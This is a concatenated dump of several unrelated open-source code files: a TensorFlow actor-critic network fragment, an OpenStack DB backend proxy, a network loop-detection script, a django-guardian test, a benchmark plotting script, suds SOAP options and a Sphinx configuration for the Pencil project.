self.opt = tf.train.RMSPropOptimizer(
learning_rate=self.var_learning_rate,
decay=Config.RMSPROP_DECAY,
momentum=Config.RMSPROP_MOMENTUM,
epsilon=Config.RMSPROP_EPSILON)
if Config.USE_GRAD_CLIP:
if Config.DUAL_RMSPROP:
self.opt_grad_v = self.opt_v.compute_gradients(self.cost_v)
self.opt_grad_v_clipped = [(tf.clip_by_norm(g, Config.GRAD_CLIP_NORM),v)
for g,v in self.opt_grad_v if not g is None]
self.train_op_v = self.opt_v.apply_gradients(self.opt_grad_v_clipped)
self.opt_grad_p = self.opt_p.compute_gradients(self.cost_p)
self.opt_grad_p_clipped = [(tf.clip_by_norm(g, Config.GRAD_CLIP_NORM),v)
for g,v in self.opt_grad_p if not g is None]
self.train_op_p = self.opt_p.apply_gradients(self.opt_grad_p_clipped)
self.train_op = [self.train_op_p, self.train_op_v]
else:
self.opt_grad = self.opt.compute_gradients(self.cost_all)
self.opt_grad_clipped = [(tf.clip_by_average_norm(g, Config.GRAD_CLIP_NORM),v) for g,v in self.opt_grad]
self.train_op = self.opt.apply_gradients(self.opt_grad_clipped)
else:
if Config.DUAL_RMSPROP:
self.train_op_v = self.opt_p.minimize(self.cost_v, global_step=self.global_step)
self.train_op_p = self.opt_v.minimize(self.cost_p, global_step=self.global_step)
self.train_op = [self.train_op_p, self.train_op_v]
else:
self.train_op = self.opt.minimize(self.cost_all, global_step=self.global_step)
def _create_tensor_board(self):
summaries = tf.get_collection(tf.GraphKeys.SUMMARIES)
summaries.append(tf.summary.scalar("Pcost_advantage", self.cost_p_1_agg))
summaries.append(tf.summary.scalar("Pcost_entropy", self.cost_p_2_agg))
summaries.append(tf.summary.scalar("Pcost", self.cost_p))
summaries.append(tf.summary.scalar("Vcost", self.cost_v))
summaries.append(tf.summary.scalar("LearningRate", self.var_learning_rate))
summaries.append(tf.summary.scalar("Beta", self.var_beta))
for var in tf.trainable_variables():
summaries.append(tf.summary.histogram("weights_%s" % var.name, var))
summaries.append(tf.summary.histogram("activation_n1", self.n1))
summaries.append(tf.summary.histogram("activation_n2", self.n2))
summaries.append(tf.summary.histogram("activation_enc", self.enc_out))
summaries.append(tf.summary.histogram("activation_v", self.logits_v))
summaries.append(tf.summary.histogram("activation_p", self.softmax_p))
self.summary_op = tf.summary.merge(summaries)
self.log_writer = tf.summary.FileWriter("logs/%s" % self.model_name, self.sess.graph)
def dense_layer(self, input, out_dim, name, func=tf.nn.relu):
in_dim = input.get_shape().as_list()[-1]
d = 1.0 / np.sqrt(in_dim)
with tf.variable_scope(name):
w_init = tf.random_uniform_initializer(-d, d)
b_init = tf.random_uniform_initializer(-d, d)
w = tf.get_variable('w', dtype=tf.float32, shape=[in_dim, out_dim], initializer=w_init)
b = tf.get_variable('b', shape=[out_dim], initializer=b_init)
output = tf.matmul(input, w) + b
if func is not None:
output = func(output)
return output
def conv2d_layer(self, input, filter_size, out_dim, name, strides, func=tf.nn.relu):
in_dim = input.get_shape().as_list()[-1]
d = 1.0 / np.sqrt(filter_size * filter_size * in_dim)
with tf.variable_scope(name):
w_init = tf.random_uniform_initializer(-d, d)
b_init = tf.random_uniform_initializer(-d, d)
w = tf.get_variable('w',
shape=[filter_size, filter_size, in_dim, out_dim],
dtype=tf.float32,
initializer=w_init)
b = tf.get_variable('b', shape=[out_dim], initializer=b_init)
output = tf.nn.conv2d(input, w, strides=strides, padding='SAME') + b
if func is not None:
output = func(output)
return output
def __get_base_feed_dict(self):
return {self.var_beta: self.beta, self.var_learning_rate: self.learning_rate}
def get_global_step(self):
step = self.sess.run(self.global_step)
return step
def predict_single(self, x):
return self.predict_p(x[None, :])[0]
def predict_v(self, x):
prediction = self.sess.run(self.logits_v, feed_dict={self.x: x})
return prediction
def predict_p(self, x):
prediction = self.sess.run(self.softmax_p, feed_dict={self.x: x})
return prediction
def predict_p_and_v(self, x, c_batch, h_batch):
batch_size = x.shape[0]
im, depth_map, vel, p_action, p_reward = self.disentangle_obs(x)
feed_dict={self.x: im, self.seq_len: 1, self.p_rewards: p_reward,
self.aux_inp: np.concatenate((vel, p_action), axis=1)}
# shape of c/h_batch: (batch_size, Config.NUM_LSTMS, 256)
for i in range(Config.NUM_LSTMS):
c = c_batch[:,i,:]
h = h_batch[:,i,:]
feed_dict.update({self.state_in[i]: (c, h)})
if Config.NUM_LSTMS:
p, v, lstm_out = self.sess.run([self.softmax_p, self.logits_v,
self.state_out], feed_dict=feed_dict)
# reshape lstm_out(c/h) to: (batch_size, Config.NUM_LSTMS, 256)
c = np.zeros((batch_size, Config.NUM_LSTMS, 256),
dtype=np.float32)
h = np.zeros((batch_size, Config.NUM_LSTMS, 256),
dtype=np.float32)
for i in range(Config.NUM_LSTMS):
c[:,i,:] = lstm_out[i][0]
h[:,i,:] = lstm_out[i][1]
return p, v, c, h
else:
p, v = self.sess.run([self.softmax_p, self.logits_v], feed_dict=feed_dict)
return p, v, [None]*x.shape[0], [None]*x.shape[0]
def disentangle_obs(self, states):
"""
The obervations x is a concatenation of image, depth_map, prev_actn,
velocity vector, and prev_rewards. This function separate these
"""
batch_size = states.shape[0]
im_size = Config.IMAGE_HEIGHT*Config.IMAGE_WIDTH*Config.IMAGE_DEPTH
im = states[:, :im_size]
im = np.reshape(im, (batch_size, Config.IMAGE_HEIGHT, Config.IMAGE_WIDTH, Config.IMAGE_DEPTH))
states = states[:, im_size:]
dm_size = Config.DEPTH_PIXELS
dm_val = states[:, :dm_size].astype(int)
states = states[:, dm_size:]
depth_map = np.zeros((dm_size, batch_size, Config.DEPTH_QUANTIZATION))
for i in range(dm_size):
depth_map[i, np.arange(batch_size), dm_val[:,i].astype(int)] = 1 # make one-hot
vl_size = Config.VEL_DIM
vel = states[:, :vl_size]
states = states[:, vl_size:]
assert states.shape[1] == 2, "Missed something ?!"
p_action = np.zeros((batch_size, self.num_actions))
p_action[np.arange(batch_size), states[:,0].astype(int)] = 1 # make one-hot
p_reward = states[:, 1]
p_reward = np.reshape(p_reward, (batch_size, 1))
# return (batch_size, ...) arrays
return im, depth_map, vel, p_action, p_reward
def train(self, x, y_r, a, c, h, trainer_id):
    """Run one optimization step on a batch of experience.

    x: raw concatenated observations; y_r: discounted returns; a: one-hot
    actions; c/h: per-layer LSTM cell/hidden states.  trainer_id is part
    of the interface but unused here.
    """
    im, depth_map, vel, p_action, p_reward = self.disentangle_obs(x)
    feed = self.__get_base_feed_dict()
    feed[self.x] = im
    feed[self.y_r] = y_r
    feed[self.action_index] = a
    feed[self.seq_len] = int(Config.TIME_MAX)
    feed[self.p_rewards] = p_reward
    feed[self.aux_inp] = np.concatenate((vel, p_action), axis=1)
    # Auxiliary depth-prediction supervision: one label tensor per pixel.
    for i in range(Config.DEPTH_PIXELS):
        feed[self.depth_labels[i]] = depth_map[i]
    # Initial recurrent state for every stacked LSTM layer.
    for i in range(Config.NUM_LSTMS):
        feed[self.state_in[i]] = (np.array(c[i]).reshape((-1, 256)),
                                  np.array(h[i]).reshape((-1, 256)))
    self.sess.run(self.train_op, feed_dict=feed)
def log(self, x, y_r, a):
    """Evaluate the summary op for this batch and write it to TensorBoard."""
    # Only the image component of the observation is fed here; the other
    # disentangled pieces are not needed by the summary op's feed.
    im, _, _, _, _ = self.disentangle_obs(x)
    feed = self.__get_base_feed_dict()
    feed.update({self.x: im, self.y_r: y_r, self.action_index: a})
    step, summary = self.sess.run([self.global_step, self.summary_op],
                                  feed_dict=feed)
    self.log_writer.add_summary(summary, step)
def _checkpoint_filename(self, episode):
    """Return the checkpoint path for *episode*, zero-padded to 8 digits."""
    return 'checkpoints/{}_{:08d}'.format(self.model_name, episode)
def _get_episode_from_filename(self, filename):
    """Extract the episode number from a checkpoint filename.

    Paths look like 'checkpoints/<model_name>_<episode>' (see
    _checkpoint_filename), so after splitting on '/', '_' and '.' the
    episode is the third token.  This breaks if model_name itself
    contains '_' or '.' -- see the TODO below.
    """
    # TODO: hacky way of getting the episode. ideally episode should be
    # stored as a TF variable
    # Raw string: the old non-raw '\.' was an invalid escape sequence
    # (DeprecationWarning on Python 3.6+, SyntaxWarning later).
    return int(re.split(r'/|_|\.', filename)[2])
def save(self, episode):
    # Persist the full session state under the per-episode checkpoint path.
    self.saver.save(self.sess, self._checkpoint_filename(episode))
def load(self):
    """Restore model weights and return the episode they were saved at.

    If Config.LOAD_EPISODE is set (> 0) that exact checkpoint is used;
    otherwise the most recent checkpoint in the checkpoint directory.
    """
    if Config.LOAD_EPISODE > 0:
        filename = self._checkpoint_filename(Config.LOAD_EPISODE)
    else:
        # Only scan the checkpoint directory when no explicit episode was
        # requested (the original always scanned, then threw the result away).
        filename = tf.train.latest_checkpoint(
            os.path.dirname(self._checkpoint_filename(episode=0)))
    self.saver.restore(self.sess, filename)
    return self._get_episode_from_filename(filename)
def get_variables_names(self):
    # Names of all trainable variables registered in this model's graph.
    return [var.name for var in self.graph.get_collection('trainable_variables')]
def get_variable_value(self, name):
    # Evaluate a single tensor (looked up by name) and return its value.
    return self.sess.run(self.graph.get_tensor_by_name(name))
| gpl-2.0 |
lakshmi-kannan/matra | openstack/common/db/api.py | 6 | 3775 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2013 Rackspace Hosting
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Multiple DB API backend support.
Supported configuration options:
The following two parameters are in the 'database' group:
`backend`: DB backend name or full module path to DB backend module.
`use_tpool`: Enable thread pooling of DB API calls.
A DB backend module should implement a method named 'get_backend' which
takes no arguments. The method can return any object that implements DB
API methods.
*NOTE*: There are bugs in eventlet when using tpool combined with
threading locks. The python logging module happens to use such locks. To
work around this issue, be sure to specify thread=False with
eventlet.monkey_patch().
A bug for eventlet has been filed here:
https://bitbucket.org/eventlet/eventlet/issue/137/
"""
import functools
from oslo.config import cfg
from heat.openstack.common import importutils
from heat.openstack.common import lockutils
# Configuration options registered under the 'database' group.  The
# deprecated_name/deprecated_group values keep backward compatibility with
# the old un-grouped option names (db_backend / dbapi_use_tpool).
db_opts = [
    cfg.StrOpt('backend',
               default='sqlalchemy',
               deprecated_name='db_backend',
               deprecated_group='DEFAULT',
               help='The backend to use for db'),
    cfg.BoolOpt('use_tpool',
                default=False,
                deprecated_name='dbapi_use_tpool',
                deprecated_group='DEFAULT',
                help='Enable the experimental use of thread pooling for '
                     'all DB API calls')
]

CONF = cfg.CONF
CONF.register_opts(db_opts, 'database')
class DBAPI(object):
    """Lazy proxy to the configured DB backend module.

    Attribute access is forwarded to the backend, which is imported on
    first use.  When CONF.database.use_tpool is set, callable attributes
    are wrapped so they execute in eventlet's thread pool.
    """

    def __init__(self, backend_mapping=None):
        # backend_mapping maps short backend names -> module paths;
        # unknown names are imported verbatim in __get_backend().
        if backend_mapping is None:
            backend_mapping = {}
        self.__backend = None
        self.__backend_mapping = backend_mapping

    @lockutils.synchronized('dbapi_backend', 'heat-')
    def __get_backend(self):
        """Get the actual backend.  May be a module or an instance of
        a class.  Doesn't matter to us.  We do this synchronized as it's
        possible multiple greenthreads started very quickly trying to do
        DB calls and eventlet can switch threads before self.__backend gets
        assigned.
        """
        if self.__backend:
            # Another thread assigned it
            return self.__backend
        backend_name = CONF.database.backend
        self.__use_tpool = CONF.database.use_tpool
        if self.__use_tpool:
            # Imported lazily so eventlet is only required when thread
            # pooling is actually enabled.
            from eventlet import tpool
            self.__tpool = tpool
        # Import the untranslated name if we don't have a
        # mapping.
        backend_path = self.__backend_mapping.get(backend_name,
                                                  backend_name)
        backend_mod = importutils.import_module(backend_path)
        self.__backend = backend_mod.get_backend()
        return self.__backend

    def __getattr__(self, key):
        # __get_backend() also sets self.__use_tpool, so it must have run
        # before the check below; the `or` guarantees that on first access.
        backend = self.__backend or self.__get_backend()
        attr = getattr(backend, key)
        if not self.__use_tpool or not hasattr(attr, '__call__'):
            return attr

        def tpool_wrapper(*args, **kwargs):
            # Run the (potentially blocking) DB call in eventlet's thread
            # pool so greenthreads are not blocked.
            return self.__tpool.execute(attr, *args, **kwargs)

        functools.update_wrapper(tpool_wrapper, attr)
        return tpool_wrapper
| apache-2.0 |
Br1an6/ACS_Netplumber_Implementation | hsa-python/net_plumbing/examples/stanford/run_loop_detection_su_bb.py | 5 | 3146 | '''
<Run loop detection test on Stanford network>
Copyright 2012, Stanford University. This file is licensed under GPL v2 plus
a special exception, as described in included LICENSE_EXCEPTION.txt.
Created on Aug 14, 2011
@author: Peyman Kazemian
'''
from examples.utils.network_loader import load_network
from config_parser.cisco_router_parser import cisco_router
from time import time
from headerspace.applications import detect_loop,print_paths
# Parameters describing the Stanford backbone snapshot: routers to load,
# the transfer-function layer layout, and the id-encoding constants used
# by the cisco parser.
settings = {"rtr_names":["bbra_rtr",
                         "bbrb_rtr",
                         "boza_rtr",
                         "bozb_rtr",
                         "coza_rtr",
                         "cozb_rtr",
                         "goza_rtr",
                         "gozb_rtr",
                         "poza_rtr",
                         "pozb_rtr",
                         "roza_rtr",
                         "rozb_rtr",
                         "soza_rtr",
                         "sozb_rtr",
                         "yoza_rtr",
                         "yozb_rtr",
                         ],
            "num_layers":3,
            "fwd_engine_layer":2,
            "input_path":"tf_stanford_backbone",
            "switch_id_multiplier":cisco_router.SWITCH_ID_MULTIPLIER,
            "port_type_multiplier":cisco_router.PORT_TYPE_MULTIPLIER,
            "out_port_type_const":cisco_router.OUTPUT_PORT_TYPE_CONST,
            "remove_duplicates":True,
            }

# Network (ntf) and topology (ttf) transfer functions, plus maps between
# human-readable port names and numeric port ids.
(ntf,ttf,port_map,port_reverse_map) = load_network(settings)
# Offset that turns an input-port id into its output-port counterpart.
output_port_addition = cisco_router.PORT_TYPE_MULTIPLIER * \
                       cisco_router.OUTPUT_PORT_TYPE_CONST

#ports that should be used in loop detection test
loop_port_ids = [
    port_map["bbra_rtr"]["te7/1"],
    port_map["bbrb_rtr"]["te7/1"],
    port_map["bbra_rtr"]["te6/3"],
    port_map["bbrb_rtr"]["te7/4"],
    port_map["bbra_rtr"]["te7/2"],
    port_map["bbrb_rtr"]["te1/1"],
    port_map["bbra_rtr"]["te6/1"],
    port_map["bbrb_rtr"]["te6/3"],
    port_map["bbra_rtr"]["te1/4"],
    port_map["bbrb_rtr"]["te1/3"],
    port_map["bbra_rtr"]["te1/3"],
    port_map["bbrb_rtr"]["te7/2"],
    port_map["bbra_rtr"]["te7/3"],
    port_map["bbrb_rtr"]["te6/1"],
    port_map["boza_rtr"]["te2/3"],
    port_map["coza_rtr"]["te2/3"],
    port_map["yozb_rtr"]["te1/3"],
    port_map["yozb_rtr"]["te1/2"],
    port_map["yoza_rtr"]["te1/1"],
    port_map["yoza_rtr"]["te1/2"],
    port_map["bozb_rtr"]["te2/3"],
    port_map["cozb_rtr"]["te2/3"],
    port_map["gozb_rtr"]["te2/3"],
    port_map["pozb_rtr"]["te2/3"],
    port_map["goza_rtr"]["te2/3"],
    port_map["poza_rtr"]["te2/3"],
    port_map["rozb_rtr"]["te2/3"],
    port_map["sozb_rtr"]["te2/3"],
    port_map["roza_rtr"]["te2/3"],
    port_map["soza_rtr"]["te2/3"],
    ]

# Time the loop-detection run and report the discovered loops.
st = time()
loops = detect_loop(ntf,ttf,loop_port_ids,None,output_port_addition)
en = time()
print_paths(loops, port_reverse_map)
# NOTE(review): Python 2 print statement -- this script targets Python 2.
print "Found ",len(loops)," loops in ",en-st," seconds."
| gpl-2.0 |
sustainingtechnologies/django-guardian | guardian/testapp/tests/orphans_test.py | 21 | 3746 | from __future__ import unicode_literals
# Try the new app settings (Django 1.7) and fall back to the old system
try:
from django.apps import apps as django_apps
auth_app = django_apps.get_app_config("auth")
except ImportError:
from django.contrib.auth import models as auth_app
from django.contrib.contenttypes.models import ContentType
from django.core.management import call_command
from django.test import TestCase
from guardian.compat import get_user_model, create_permissions
from guardian.utils import clean_orphan_obj_perms
from guardian.shortcuts import assign_perm
from guardian.models import Group
from guardian.testapp.tests.conf import skipUnlessTestApp
User = get_user_model()
# Lower-cased model name of the (possibly swapped) user model; used below to
# build the 'change_<model>' permission codename.
# NOTE(review): `_meta.module_name` was removed in Django 1.8 (renamed to
# `_meta.model_name`) -- confirm the supported Django range before upgrading.
user_module_name = User._meta.module_name
@skipUnlessTestApp
class OrphanedObjectPermissionsTest(TestCase):
    """Verify that object permissions whose target objects were deleted
    ("orphans") are removed, both via clean_orphan_obj_perms() directly and
    via the management command.

    The two original tests duplicated the assign / delete / recreate /
    assert machinery wholesale; it now lives in the shared helpers below.
    """

    def setUp(self):
        # Create objects for which we would assign obj perms
        self.target_user1 = User.objects.create(username='user1')
        self.target_group1 = Group.objects.create(name='group1')
        self.target_obj1 = ContentType.objects.create(
            name='ct1', model='foo', app_label='fake-for-guardian-tests')
        self.target_obj2 = ContentType.objects.create(
            name='ct2', model='bar', app_label='fake-for-guardian-tests')
        # Required if MySQL backend is used :/
        create_permissions(auth_app, [], 1)

        self.user = User.objects.create(username='user')
        self.group = Group.objects.create(name='group')

    def _target_perms(self):
        """Mapping of target objects to the obj perms assigned on them."""
        return {
            self.target_user1: ["change_%s" % user_module_name],
            self.target_group1: ["delete_group"],
            self.target_obj1: ["change_contenttype", "delete_contenttype"],
            self.target_obj2: ["change_contenttype"],
        }

    def _assign_and_orphan(self, target_perms):
        """Assign all perms to self.user, then delete the targets so the
        object permissions become orphaned.  Original pks are stashed on
        each target so it can be recreated later."""
        for target, perms in target_perms.items():
            target.__old_pk = target.pk  # Store pkeys
            for perm in perms:
                assign_perm(perm, self.user, target)
        # Remove targets
        for target in target_perms:
            target.delete()

    def _assert_perms_gone(self, target_perms):
        """Recreate targets under their old pks and verify the user no
        longer holds any of the previously assigned object permissions."""
        for target, perms in target_perms.items():
            target.pk = target.__old_pk
            target.save()
            for perm in perms:
                self.assertFalse(self.user.has_perm(perm, target))

    def test_clean_perms(self):
        target_perms = self._target_perms()
        obj_perms_count = sum(len(perms) for perms in target_perms.values())
        self._assign_and_orphan(target_perms)
        # Clean orphans
        removed = clean_orphan_obj_perms()
        self.assertEqual(removed, obj_perms_count)
        self._assert_perms_gone(target_perms)

    def test_clean_perms_command(self):
        """
        Same test as the one above but rather than calling the function
        directly, we call the management command instead.
        """
        target_perms = self._target_perms()
        self._assign_and_orphan(target_perms)
        # Clean orphans
        call_command("clean_orphan_obj_perms", verbosity=0)
        self._assert_perms_gone(target_perms)
| bsd-2-clause |
vibhaa/propane | scripts/propane/backbone.py | 2 | 4328 | import csv
import os.path
import numpy as np
import matplotlib.pyplot as plt
# collect stats from csv
num_pods = []
num_nodes = []
sizes_raw = []
sizes_compressed = []
tpp_total_mean = []
tpp_build_mean = []
tpp_minimize_mean = []
tpp_order_mean = []
tpp_gen_mean = []
tpp_compress_mean = []

# read values from csv file
# NOTE(review): this script is Python 2 -- `map` below returns lists, and
# the tuple-parameter lambdas further down are Python-2-only syntax.
direct = os.path.dirname(os.path.realpath(__file__))
with open(direct + os.path.sep + 'stats-backbone.csv') as f:
    r = csv.reader(f)
    for row in r:
        num_pods.append(row[0])
        num_nodes.append(row[1])
        sizes_raw.append(row[4])
        sizes_compressed.append(row[5])
        tpp_total_mean.append(row[10])
        tpp_build_mean.append(row[13])
        tpp_minimize_mean.append(row[16])
        tpp_order_mean.append(row[19])
        tpp_gen_mean.append(row[22])
        tpp_compress_mean.append(row[25])

# remove header info, and convert type
num_pods = map(int, num_pods[1:])
num_nodes = map(int, num_nodes[1:])
sizes_raw = map(int, sizes_raw[1:])
sizes_compressed = map(int, sizes_compressed[1:])
tpp_total_mean = map(float, tpp_total_mean[1:])
tpp_build_mean = map(float, tpp_build_mean[1:])
tpp_minimize_mean = map(float, tpp_minimize_mean[1:])
tpp_order_mean = map(float, tpp_order_mean[1:])
tpp_gen_mean = map(float, tpp_gen_mean[1:])
tpp_compress_mean = map(float, tpp_compress_mean[1:])

#====================================================
#
# Stack plot of compilation times broken down by task
#
#====================================================

# stack data lowest -> highest (build, minimize, order, gen, compress)
data = (tpp_build_mean, tpp_minimize_mean, tpp_order_mean, tpp_gen_mean)
foo = np.row_stack( data )
# cumulative sums give the upper boundary of each stacked band
y_stack = np.cumsum(foo, axis=0)

# plot colors
#color1 = "#FFC09F"
#color2 = "#FFEE93"
#color3 = "#FCF5C7"
#color4 = "#A0CED9"
#color5 = "#ADF7B6"
color1 = "#828A95"
color2 = "#CEEAF7"
color3 = "#CCD7E4"
color4 = "#D5C9DF"
# color5 = "#DCB8CB"

# stacked plot showing different running times
fig = plt.figure()
plt.grid()
ax1 = fig.add_subplot(111)
ax1.fill_between(num_nodes, 0, y_stack[0,:], facecolor=color1, alpha=.7)
ax1.fill_between(num_nodes, y_stack[0,:], y_stack[1,:], facecolor=color2, alpha=.7)
ax1.fill_between(num_nodes, y_stack[1,:], y_stack[2,:], facecolor=color3)
ax1.fill_between(num_nodes, y_stack[2,:], y_stack[3,:], facecolor=color4)
ax1.set_xlabel('Routers', fontsize=35)
ax1.set_ylabel('Avg. Time / Predicate (s)', fontsize=35)
ax1.tick_params(axis='both', which='major', labelsize=35)
ax1.tick_params(axis='both', which='minor', labelsize=35)
ax1.xaxis.set_ticks([0,40,80,120,160,200])
ax1.yaxis.set_ticks([5,15,25,35,45])
#ax1.set_xlim([0,1400])
#ax1.set_ylim([0,20])

# custom legend for stack color
p1 = plt.Rectangle((0, 0), 1, 1, fc=color1, alpha=.7)
p2 = plt.Rectangle((0, 0), 1, 1, fc=color2, alpha=.7)
p3 = plt.Rectangle((0, 0), 1, 1, fc=color3, alpha=.7)
p4 = plt.Rectangle((0, 0), 1, 1, fc=color4, alpha=.7)
leg_boxes = [p4, p3, p2, p1]
descrs = ["Gen/Min ABGP", "Find Preferences", "Minimize PG", "Construct PG"]
ax1.legend(leg_boxes, descrs, loc=2, fontsize=24)
fig.savefig('compilation-times-backbone.png', bbox_inches='tight')

#====================================================
#
# Size of generated vs compressed ABGP (bar)
#
#====================================================

num_nodes1 = num_nodes
num_nodes2 = map(lambda x: x, num_nodes)
# per-router config sizes (integer division; Py2 tuple-unpacking lambdas)
sizes_raw_per = map(lambda (size,n): size/n, zip(sizes_raw, num_nodes))
sizes_compressed_per = map(lambda (size,n): size/n, zip(sizes_compressed, num_nodes))
# sample every 5th data point (starting at index 2) to keep the bars readable
num_nodes1 = num_nodes1[2::5]
num_nodes2 = num_nodes2[2::5]
sizes_raw_per = sizes_raw_per[2::5]
sizes_compressed_per = sizes_compressed_per[2::5]

fig = plt.figure()
ax1 = fig.add_subplot(111)
ax1.bar(num_nodes1, sizes_raw_per, width=5.2, color=color1, alpha=1, align='center', log=True)
ax1.bar(num_nodes2, sizes_compressed_per, width=5.2, color=color3, alpha=1, align='center',log=True)
ax1.set_xlabel('Routers', fontsize=35)
ax1.set_ylabel('ABGP Lines/Router', fontsize=35)
ax1.tick_params(axis='both', which='major', labelsize=35)
ax1.tick_params(axis='both', which='minor', labelsize=35)
ax1.set_xlim([0,220])
ax1.set_ylim([0,10*10*10*10*10*10*10])
leg_boxes = [p1, p3]
descrs = ["Raw Config", "Minimized Config"]
ax1.legend(leg_boxes, descrs, loc=2, fontsize=24)
fig.savefig('config-compression-backbone.png', bbox_inches='tight') | mit |
TNosredna/CouchPotatoServer | libs/suds/options.py | 165 | 5074 | # This program is free software; you can redistribute it and/or modify
# it under the terms of the (LGPL) GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library Lesser General Public License for more details at
# ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# written by: Jeff Ortel ( jortel@redhat.com )
"""
Suds basic options classes.
"""
from suds.properties import *
from suds.wsse import Security
from suds.xsd.doctor import Doctor
from suds.transport import Transport
from suds.cache import Cache, NoCache
class TpLinker(AutoLinker):
    """
    Automatic linker that keeps Transport objects' Properties linked to the
    Properties objects that contain them: when a property value changes,
    the previous transport (if any) is unlinked and the new one linked.
    """

    def updated(self, properties, prev, next):
        # Unlink the outgoing transport first, then link the incoming one.
        for transport, action in ((prev, properties.unlink),
                                  (next, properties.link)):
            if isinstance(transport, Transport):
                action(Unskin(transport.options))
class Options(Skin):
    """
    Options:
        - B{cache} - The XML document cache.  May be set (None) for no caching.
            - type: L{Cache}
            - default: L{NoCache}
        - B{faults} - Raise faults raised by server,
            else return tuple from service method invocation as (httpcode, object).
            - type: I{bool}
            - default: True
        - B{service} - The default service name.
            - type: I{str}
            - default: None
        - B{port} - The default service port name, not tcp port.
            - type: I{str}
            - default: None
        - B{location} - This overrides the service port address I{URL} defined
            in the WSDL.
            - type: I{str}
            - default: None
        - B{transport} - The message transport.
            - type: L{Transport}
            - default: None
        - B{soapheaders} - The soap headers to be included in the soap message.
            - type: I{any}
            - default: None
        - B{wsse} - The web services I{security} provider object.
            - type: L{Security}
            - default: None
        - B{doctor} - A schema I{doctor} object.
            - type: L{Doctor}
            - default: None
        - B{xstq} - The B{x}ml B{s}chema B{t}ype B{q}ualified flag indicates
            that the I{xsi:type} attribute values should be qualified by namespace.
            - type: I{bool}
            - default: True
        - B{prefixes} - Elements of the soap message should be qualified (when needed)
            using XML prefixes as opposed to xmlns="" syntax.
            - type: I{bool}
            - default: True
        - B{retxml} - Flag that causes the I{raw} soap envelope to be returned instead
            of the python object graph.
            - type: I{bool}
            - default: False
        - B{prettyxml} - Flag that causes I{pretty} xml to be rendered when generating
            the outbound soap envelope.
            - type: I{bool}
            - default: False
        - B{autoblend} - Flag that ensures that the schema(s) defined within the
            WSDL import each other.
            - type: I{bool}
            - default: False
        - B{cachingpolicy} - The caching policy.
            - type: I{int}
            - 0 = Cache XML documents.
            - 1 = Cache WSDL (pickled) object.
            - default: 0
        - B{plugins} - A plugin container.
            - type: I{list}
    """
    def __init__(self, **kwargs):
        # Namespace under which these properties are registered; Definition
        # entries declare (name, accepted type(s), default [, linker]).
        # The table must mirror the class docstring above.
        domain = __name__
        definitions = [
            Definition('cache', Cache, NoCache()),
            Definition('faults', bool, True),
            # TpLinker keeps the transport's own options linked to ours.
            Definition('transport', Transport, None, TpLinker()),
            Definition('service', (int, basestring), None),
            Definition('port', (int, basestring), None),
            Definition('location', basestring, None),
            Definition('soapheaders', (), ()),
            Definition('wsse', Security, None),
            Definition('doctor', Doctor, None),
            Definition('xstq', bool, True),
            Definition('prefixes', bool, True),
            Definition('retxml', bool, False),
            Definition('prettyxml', bool, False),
            Definition('autoblend', bool, False),
            Definition('cachingpolicy', int, 0),
            Definition('plugins', (list, tuple), []),
        ]
        Skin.__init__(self, domain, definitions, kwargs)
| gpl-3.0 |
prikhi/pencil | docs/source/conf.py | 1 | 8538 | # -*- coding: utf-8 -*-
#
# Pencil documentation build configuration file, created by
# sphinx-quickstart on Sat Mar 28 12:07:54 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# Is the build being run by ReadTheDocs.org or locally?
# RTD exports READTHEDOCS='True' in its build environment; the flag is used
# below to decide whether to load the locally installed sphinx_rtd_theme.
on_readthedocs = os.environ.get("READTHEDOCS", None) == 'True'
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.todo', 'sphinxcontrib.autoanysrc',
]
todo_include_todos = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Pencil'
copyright = u'2015, Pencil Contributors'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '2.0.21'
# The full version, including alpha/beta/rc tags.
release = '2.0.21'
# NOTE(review): version and release are duplicated by hand -- bump both
# together (or derive release from version) when cutting a release.
# Default Sphinx domain: un-prefixed directives/roles refer to JavaScript.
primary_domain = 'js'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
